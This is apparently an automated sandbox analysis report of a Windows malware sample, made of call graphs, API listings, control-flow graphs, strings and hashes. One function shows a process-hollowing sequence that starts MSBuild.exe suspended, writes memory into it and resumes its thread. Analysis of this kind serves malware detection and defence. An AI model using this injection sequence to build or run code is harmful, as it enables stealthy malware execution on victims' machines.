20836->20897 20894 2ad0b6 WaitForSingleObjectEx GetExitCodeThread CloseHandle 20837->20894 20842 2a21f5 20898 2aa1d4 30 API calls 2 library calls 20842->20898 20845 2a2163 20845->20842 20846 2a97fb std::ios_base::_Init 3 API calls 20845->20846 20847 2a217e 20846->20847 20848 2b3e7d 49 API calls 20847->20848 20849 2a219d 20848->20849 20849->20834 20849->20835 20850 2a21af GetCurrentThreadId 20849->20850 20850->20836 20851 2a21b8 20850->20851 20895 2ad0b6 WaitForSingleObjectEx GetExitCodeThread CloseHandle 20851->20895 20853 2a21c7 20853->20842 20854 2a21ce 20853->20854 20855 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20854->20855 20856 2a21dc 20855->20856 20858 2ad81c GetModuleHandleW 20856->20858 20857->20798 20858->20806 20859->20808 20860->20811 20861->20792 20862->20794 20863->20796 20864->20815 20865->20817 20870 2bcc5e 20866->20870 20869 2aeda8 7 API calls 2 library calls 20869->20818 20871 2bcc6e 20870->20871 20872 2a9a7f 20870->20872 20871->20872 20874 2bc3d2 20871->20874 20872->20821 20872->20869 20876 2bc3d9 20874->20876 20875 2bc41c GetStdHandle 20875->20876 20876->20875 20877 2bc47e 20876->20877 20878 2bc42f GetFileType 20876->20878 20877->20871 20878->20876 20880 2b3e8a 20879->20880 20881 2b3e9e 20879->20881 20910 2b6211 14 API calls __strnicoll 20880->20910 20901 2b3f0e 20881->20901 20884 2b3e8f 20911 2b68fc 29 API calls __strnicoll 20884->20911 20887 2b3eb3 CreateThread 20889 2b3ed2 GetLastError 20887->20889 20892 2b3ede 20887->20892 20921 2b3f95 20887->20921 20888 2b3e9a 20888->20830 20912 2b6237 14 API calls 2 library calls 20889->20912 20913 2b3f5e 20892->20913 20894->20845 20895->20853 20902 2bbc50 __strnicoll 14 API calls 20901->20902 20903 2b3f1f 20902->20903 20904 2ba897 ___free_lconv_mon 14 API calls 20903->20904 20905 2b3f2c 20904->20905 20906 2b3f33 GetModuleHandleExW 20905->20906 20907 2b3f50 20905->20907 20906->20907 20908 2b3f5e 16 API calls 20907->20908 20909 2b3eaa 20908->20909 20909->20887 20909->20892 20910->20884 20911->20888 20912->20892 20914 2b3f6a 20913->20914 20920 2b3ee9 20913->20920 20915 2b3f79 20914->20915 20916 2b3f70 CloseHandle 20914->20916 20917 2b3f88 20915->20917 20918 2b3f7f FreeLibrary 20915->20918 20916->20915 20919 2ba897 ___free_lconv_mon 14 API calls 20917->20919 20918->20917 20919->20920 20920->20830 20922 2b3fa1 ___scrt_is_nonwritable_in_current_image 20921->20922 20923 2b3fa8 GetLastError ExitThread 20922->20923 20924 2b3fb5 20922->20924 20935 2bab23 GetLastError 20924->20935 20929 2b3fd1 20967 2b3f00 17 API calls 20929->20967 20936 2bab39 20935->20936 20937 2bab3f 20935->20937 20968 2bb53b 6 API calls std::_Locinfo::_Locinfo_dtor 20936->20968 20941 2bab43 SetLastError 20937->20941 20969 2bb57a 6 API calls std::_Locinfo::_Locinfo_dtor 20937->20969 20940 2bab5b 20940->20941 20943 2bbc50 __strnicoll 14 API calls 20940->20943 20944 2babd8 20941->20944 20945 2b3fba 20941->20945 20946 2bab70 20943->20946 20974 2b6e66 39 API calls CallUnexpected 20944->20974 20962 2be0dc 20945->20962 20948 2bab89 20946->20948 20949 2bab78 20946->20949 20971 2bb57a 6 API calls std::_Locinfo::_Locinfo_dtor 20948->20971 20970 2bb57a 6 API calls std::_Locinfo::_Locinfo_dtor 20949->20970 20953 2bab95 20955 2bab99 20953->20955 20956 2babb0 20953->20956 20954 2bab86 20958 2ba897 ___free_lconv_mon 14 API calls 20954->20958 20972 2bb57a 6 API calls std::_Locinfo::_Locinfo_dtor 20955->20972 20973 2bae34 14 API calls __strnicoll 20956->20973 20958->20941 20960 2babbb 20961 2ba897 ___free_lconv_mon 14 API calls 20960->20961 20961->20941 20963 2be0ec CallUnexpected 20962->20963 20964 2b3fc5 20962->20964 20963->20964 20975 2bb830 20963->20975 20964->20929 20966 2bb787 5 API calls std::_Locinfo::_Locinfo_dtor 20964->20966 20966->20929 20968->20937 20969->20940 20970->20954 20971->20953 20972->20954 20973->20960 20978 2bb97d 20975->20978 20979 2bb9ad 20978->20979 20983 2bb84c 20978->20983 20979->20983 20985 2bb8b2 20979->20985 20982 2bb9c7 GetProcAddress 20982->20983 20984 2bb9d7 std::_Locinfo::_Locinfo_dtor 20982->20984 20983->20964 20984->20983 20986 2bb8c3 ___vcrt_FlsGetValue 20985->20986 20987 2bb959 20986->20987 20988 2bb8e1 LoadLibraryExW 20986->20988 20992 2bb92f LoadLibraryExW 20986->20992 20987->20982 20987->20983 20989 2bb8fc GetLastError 20988->20989 20990 2bb960 20988->20990 20989->20986 20990->20987 20991 2bb972 FreeLibrary 20990->20991 20991->20987 20992->20986 20992->20990 21058 2bc2f0 15 API calls 21138 2ab7f5 72 API calls error_info_injector 21059 2a96cf 47 API calls 2 library calls 21141 2b13cc 15 API calls 2 library calls 21146 2a3dc0 72 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 21148 2a9fc4 9 API calls 3 library calls 21151 2ae3de 30 API calls 21065 2baadd 16 API calls __strnicoll 21066 2a6cd0 99 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 21153 2a85d0 48 API calls

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 002D61A9 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,002D611B,002D610B), ref: 002D633F
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 002D6352
                                                                                                                                                                                                                                        • Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 002D6370
                                                                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(0000012C,?,002D615F,00000004,00000000), ref: 002D6394
                                                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(0000012C,?,?,00003000,00000040), ref: 002D63BF
                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(0000012C,00000000,?,?,00000000,?), ref: 002D6417
                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(0000012C,00400000,?,?,00000000,?,00000028), ref: 002D6462
                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(0000012C,?,?,00000004,00000000), ref: 002D64A0
                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(00000088,00AF0000), ref: 002D64DC
                                                                                                                                                                                                                                        • ResumeThread.KERNELBASE(00000088), ref: 002D64EB
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                        • API String ID: 2687962208-3857624555
                                                                                                                                                                                                                                        • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                        • Instruction ID: 9b63fcbff6e00e5415b9081d962dbb2e04f544dab12d7099f54cd576d8732cc6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18B1F67260028AAFDB60CF68CC80BDA77A5FF88714F158165EA08AB341D770FE51CB94
                                                                                                                                                                                                                                        Function 002A1B70 Relevance: 10.8, APIs: 7, Instructions: 267filewindowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 64 2a1b70-2a1bd6 GetPEB call 2a1000 CreateFileA 67 2a1ea9-2a1ebd call 2a986f 64->67 68 2a1bdc-2a1bea GetFileSize 64->68 69 2a1e82-2a1e89 CloseHandle 68->69 70 2a1bf0-2a1c0f call 2a9861 ReadFile 68->70 69->67 75 2a1e79-2a1e7f call 2a986a 70->75 76 2a1c15-2a1c2a CloseHandle 70->76 75->69 77 2a1e8b-2a1e93 76->77 78 2a1c30-2a1c4f 76->78 80 2a1e9a-2a1ea1 call 2a1ab0 77->80 81 2a1c6e-2a1c8e call 2b8870 78->81 85 2a1ea6 80->85 87 2a1ebe call 2a34f0 81->87 88 2a1c94-2a1c9d 81->88 85->67 92 2a1ec3-2a1ed7 call 2b690c 87->92 90 2a1c9f-2a1cbb call 2b0360 88->90 91 2a1cc0-2a1cd5 88->91 103 2a1d1e-2a1d44 90->103 94 2a1cf0-2a1cfc call 2a97fb 91->94 95 2a1cd7-2a1cec call 2a97fb 91->95 107 2a1ed9-2a1edc 92->107 108 2a1ee6-2a1ee8 92->108 104 2a1cfe-2a1d1a call 2b0360 94->104 95->104 105 2a1d4a-2a1d58 103->105 106 2a1dc8-2a1dd5 103->106 104->103 110 2a1d5a-2a1d5f 105->110 111 2a1da0-2a1daa 105->111 114 2a1df3-2a1dff 106->114 115 2a1dd7-2a1dda 106->115 112 2a1eeb DefWindowProcW 107->112 113 2a1ede-2a1ee0 PostQuitMessage 107->113 118 2a1d60-2a1d9e 110->118 111->106 119 2a1dac-2a1dc6 111->119 113->108 116 2a1e01-2a1e10 114->116 120 2a1de9-2a1df1 115->120 121 2a1ddc-2a1ddf 115->121 123 2a1e12-2a1e1b 116->123 124 2a1e41-2a1e5f 116->124 118->111 118->118 119->106 120->114 121->116 122 2a1de1-2a1de6 121->122 122->120 125 2a1e1d-2a1e28 123->125 126 2a1e37-2a1e3e call 2a9830 123->126 127 2a1c60-2a1c68 124->127 128 2a1e65-2a1e74 124->128 125->92 129 2a1e2e-2a1e35 125->129 126->124 127->80 127->81 128->127 129->126
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002A1000: _strlen.LIBCMT ref: 002A1067
                                                                                                                                                                                                                                        • CreateFileA.KERNELBASE ref: 002A1BD1
                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 002A1BE1
                                                                                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 002A1C07
                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 002A1C16
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 002A1C84
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002A1E83
                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 002A1EE0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CloseHandle_strlen$CreateMessagePostQuitReadSize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3694359222-0
                                                                                                                                                                                                                                        • Opcode ID: 0ef5f7d573636a6907aa85ce9bd334bea8cfc270a79b4b797320352f2998a39c
                                                                                                                                                                                                                                        • Instruction ID: 9470c7981e5e7a9d749ac393af3d60380e6f350b45d33afe3da5fa82619ad1cb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ef5f7d573636a6907aa85ce9bd334bea8cfc270a79b4b797320352f2998a39c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 779127729243119FC314DF24D88962BBBE5FF8A360F15492EF8858B351EB34D964CB92
                                                                                                                                                                                                                                        Function 002A7AF0 Relevance: .6, Instructions: 635COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f47a35c19b700b03707c330cd3a1779738bf2084adec634af6638c8ad568656a
                                                                                                                                                                                                                                        • Instruction ID: ca96a84f3e2c3afd9d590ec833ef808ec0e996ec79e35ab5d1c12cf7c78a41b3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f47a35c19b700b03707c330cd3a1779738bf2084adec634af6638c8ad568656a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E32A17062C7418FC714CF28C49062ABBE2BF86304F148A5DE49A8B3A1DF75ED55CB96
                                                                                                                                                                                                                                        Function 002A20D0 Relevance: 13.6, APIs: 9, Instructions: 109threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 002A20E8
                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002A20F9
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002A214A
                                                                                                                                                                                                                                          • Part of subcall function 002AD0B6: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 002AD0C2
                                                                                                                                                                                                                                          • Part of subcall function 002AD0B6: GetExitCodeThread.KERNEL32(?,?), ref: 002AD0DB
                                                                                                                                                                                                                                          • Part of subcall function 002AD0B6: CloseHandle.KERNEL32(?), ref: 002AD0ED
                                                                                                                                                                                                                                          • Part of subcall function 002B3E7D: CreateThread.KERNELBASE(?,?,Function_00013F95,00000000,?,?), ref: 002B3EC6
                                                                                                                                                                                                                                          • Part of subcall function 002B3E7D: GetLastError.KERNEL32 ref: 002B3ED2
                                                                                                                                                                                                                                          • Part of subcall function 002B3E7D: __dosmaperr.LIBCMT ref: 002B3ED9
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002A21AF
                                                                                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 002A21E9
                                                                                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 002A21F0
                                                                                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 002A21F7
                                                                                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 002A2204
                                                                                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 002A2213
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cpp_errorThrow_std::_$Thread$CurrentHandleModule$CloseCodeCreateErrorExitFileLastNameObjectSingleWait__dosmaperr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 686914455-0
                                                                                                                                                                                                                                        • Opcode ID: ae48edd374ab79ad16eb93c3fceaa60a0f6bd636d977d491e181b9d30022d8c5
                                                                                                                                                                                                                                        • Instruction ID: eea45fd2a52f8132e43a3e1b5d841638d6e9af652e8e0bbbf5f12d74b7488a77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae48edd374ab79ad16eb93c3fceaa60a0f6bd636d977d491e181b9d30022d8c5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1631B3B1A60301BBE720AF659C07B9A77A49F47B40F004419FA4D6A1C5EFB49974CFA3
                                                                                                                                                                                                                                        Function 002BB8B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 132 2bb8b2-2bb8be 133 2bb950-2bb953 132->133 134 2bb959 133->134 135 2bb8c3-2bb8d4 133->135 136 2bb95b-2bb95f 134->136 137 2bb8e1-2bb8fa LoadLibraryExW 135->137 138 2bb8d6-2bb8d9 135->138 141 2bb8fc-2bb905 GetLastError 137->141 142 2bb960-2bb970 137->142 139 2bb979-2bb97b 138->139 140 2bb8df 138->140 139->136 144 2bb94d 140->144 145 2bb93e-2bb94b 141->145 146 2bb907-2bb919 call 2beeb4 141->146 142->139 143 2bb972-2bb973 FreeLibrary 142->143 143->139 144->133 145->144 146->145 149 2bb91b-2bb92d call 2beeb4 146->149 149->145 152 2bb92f-2bb93c LoadLibraryExW 149->152 152->142 152->145
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,DAA4AEFB,?,002BB9C1,?,?,00000000), ref: 002BB973
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                        • Opcode ID: 44bdcc1f2a0eee1f7612c9701c5d1baa20634ed4c511c7f606db4b2494d55059
                                                                                                                                                                                                                                        • Instruction ID: 8bb3f163646e87e1c31abbbed64bc652bf503c40eb1a92d7cd699f6586d42355
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44bdcc1f2a0eee1f7612c9701c5d1baa20634ed4c511c7f606db4b2494d55059
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2210531E22616BBD7229F21EC85ADA3768DF417F0F250121EA15A72D0D7B0EE10CAE1
                                                                                                                                                                                                                                        Function 002A14C0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 248COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 153 2a14c0-2a1533 call 2b8870 156 2a1542-2a154c 153->156 157 2a1535-2a153f 153->157 158 2a154e-2a1551 156->158 159 2a1556-2a155c 156->159 157->156 161 2a16f6-2a1717 158->161 162 2a155e-2a1560 159->162 163 2a157c-2a1588 159->163 164 2a1719-2a1720 call 2abaae 161->164 165 2a1750-2a1792 call 2a3120 call 2a3190 call 2ae6da 161->165 162->163 166 2a1562-2a1576 call 2a2940 162->166 167 2a158e-2a1598 163->167 168 2a1622-2a1637 call 2ab367 163->168 181 2a1729-2a1734 164->181 182 2a1722-2a1724 call 2a3b30 164->182 166->161 166->163 167->168 172 2a159e-2a15a3 167->172 175 2a163a-2a164f 168->175 177 2a15db-2a15f3 172->177 183 2a16d1-2a16d4 175->183 184 2a1655-2a165f 175->184 178 2a15b0-2a15bc 177->178 179 2a15f5-2a15fc 177->179 194 2a15c2-2a15d9 178->194 200 2a16d6-2a16db 178->200 179->178 186 2a15fe-2a160d 179->186 190 2a173b-2a174f call 2a986f 181->190 191 2a1736 181->191 182->181 185 2a16df-2a16f4 183->185 184->183 189 2a1661-2a1666 184->189 185->161 186->194 196 2a16a1-2a16b5 189->196 191->190 194->177 201 2a160f-2a1620 194->201 198 2a1670-2a167c 196->198 199 2a16b7-2a16be 196->199 198->200 204 2a167e-2a169f 198->204 199->198 203 2a16c0-2a16cf 199->203 200->185 201->168 203->204 204->183 204->196
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strlen
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                        • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                        • Opcode ID: 891af424b06b911049d95731f4c4da951a3f966848a224136274e83b05c694d8
                                                                                                                                                                                                                                        • Instruction ID: 0eceb4cc3ecada8fe636a6e50337c9207a65e9b67d9d53cc1b7245b31d9d2884
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 891af424b06b911049d95731f4c4da951a3f966848a224136274e83b05c694d8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B89191746142008FDB14CF29C494B25B7E6FF8A724F1886ACE9468F3A6DB35EC65CB41
                                                                                                                                                                                                                                        Function 002A1AB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002A1000: _strlen.LIBCMT ref: 002A1067
                                                                                                                                                                                                                                        • FreeConsole.KERNELBASE(?,?,?,002D4808,ios_base::badbit set), ref: 002A1AE1
                                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(002D601C,00000549,00000040,?), ref: 002A1B30
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 002A1B66
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleExitFreeProcessProtectVirtual_strlen
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 4233975149-3882152299
                                                                                                                                                                                                                                        • Opcode ID: d2502d53a253e0d97f845a4d74a84b87fcce3e1ee5bcebcb4b18edd2153036da
                                                                                                                                                                                                                                        • Instruction ID: 12dc254bb3ed72627faf767e310fa0cd1a94a95aac2d7a0129fee9ad0cf9f013
